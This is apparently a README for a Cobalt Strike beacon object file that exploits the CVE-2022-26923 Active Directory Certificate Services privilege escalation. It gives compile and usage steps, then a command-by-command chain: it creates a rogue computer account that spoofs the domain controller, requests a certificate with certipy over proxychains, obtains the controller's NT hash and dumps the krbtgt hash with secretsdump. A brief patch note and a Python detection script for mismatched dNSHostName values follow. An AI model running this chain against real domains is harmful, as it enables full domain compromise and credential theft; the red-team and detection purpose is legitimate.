CVE-2022-26923 BOF

A BOF version of the Active Directory Certificate Services (AD CS) Domain Privilege Escalation exploit (CVE-2022-26923) published by @ly4k_. This code is based on our AddMachineAccount BOF with some minor changes regarding the dNSHostName and servicePrincipalName attributes.

For all technical details refer to the following excellent blogpost by Oliver Lyak (@ly4k_): Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923).

How to compile

  1. Make sure that Mingw-w64 (including mingw-w64-binutils) has been installed.
  2. Enter the SOURCE folder within the tool folder.
  3. Type "make" to compile the object files.
  4. Use Cobalt Strike's Script Manager to import the CVE-2022-26923.cna script.

Usage

Running the tool is straightforward. Once you have imported the CNA script using Cobalt Strike's Script Manager, it is available as a Cobalt Strike command that can be executed within a beacon. This tool supports the following command:

  • CVE-2022-26923 [*Computername] [Optional Password]

* Computername does not have to end with a $ character.

Example attack

Create a new computer account named DCPWN with the dNSHostName attribute set to the domain controller's FQDN.

CVE-2022-26923 DCPWN

If the DC is not patched and the new computer account is successfully created, configure a SOCKS proxy on the beacon.

socks <port>

On the teamserver, or any other machine that can access the socks port on the teamserver, install Certipy. Use Certipy in combination with proxychains to request a machine certificate.

proxychains certipy req 'example.local/DCPWN$:<Password>@<CA server IP>' -ca <CA-NAME> -template Machine

Then, use Certipy in combination with proxychains to authenticate to the domain using the requested certificate.

proxychains certipy auth -pfx dc2019.pfx -dc-ip <DC IP>

Finally, use the obtained NT hash of the domain controller to stage other attacks (such as performing a DCsync operation).

proxychains secretsdump.py 'example.local/DC2019$@<DC IP>' -hashes :<DC NT Hash> -just-dc-user krbtgt

Note to Blue

To mitigate the vulnerability, install Microsoft's patches released in May 2022.
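As an added example that is not part of this repository, the check below runs over an export of computer objects and flags the condition the example attack above creates: a machine account (DCPWN$) whose dNSHostName does not match its own account name and duplicates the domain controller's FQDN. The sample records, host names and domain are constructed for the example.

```python
# Added example (not part of the CVE-2022-26923 BOF project): review exported
# AD computer objects for dNSHostName values that do not agree with the
# account name or that are shared with another computer object.
from collections import defaultdict

# Constructed sample export (sAMAccountName, dNSHostName); all values are assumptions.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "DC2019$", "dNSHostName": "dc2019.example.local"},
    {"sAMAccountName": "WS01$", "dNSHostName": "ws01.example.local"},
    {"sAMAccountName": "DCPWN$", "dNSHostName": "dc2019.example.local"},  # rogue account
    {"sAMAccountName": "FS01$", "dNSHostName": None},  # attribute never set
]


def expected_host_label(sam_account_name):
    """Computer accounts are named HOST$; their dNSHostName should start with HOST."""
    return sam_account_name.rstrip("$").lower()


def find_suspicious_computers(computers):
    """Return {sAMAccountName: [reasons]} for objects that deserve review."""
    findings = defaultdict(list)
    owners = defaultdict(list)  # dNSHostName -> accounts claiming it
    for obj in computers:
        name, fqdn = obj["sAMAccountName"], obj.get("dNSHostName")
        if not fqdn:
            continue  # an unset dNSHostName is normal for staged accounts
        owners[fqdn.lower()].append(name)
        if fqdn.split(".")[0].lower() != expected_host_label(name):
            findings[name].append(f"dNSHostName {fqdn} does not match account name")
    for fqdn, names in owners.items():
        if len(names) > 1:
            for name in names:
                others = ", ".join(n for n in names if n != name)
                findings[name].append(f"dNSHostName {fqdn} is also claimed by {others}")
    return dict(findings)


if __name__ == "__main__":
    for account, reasons in find_suspicious_computers(SAMPLE_COMPUTERS).items():
        for reason in reasons:
            print(f"{account}: {reason}")
```

Feed it the real export instead of SAMPLE_COMPUTERS; an account that both mismatches its name and claims a domain controller's FQDN is the pattern described in the example attack.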

Support

This BOF tool has been successfully compiled on Mac OSX systems and used on Windows 8.1+ (x64) systems. Compiling the BOF code should also work on other systems (Linux, Windows) that have the Mingw-w64 compiler installed.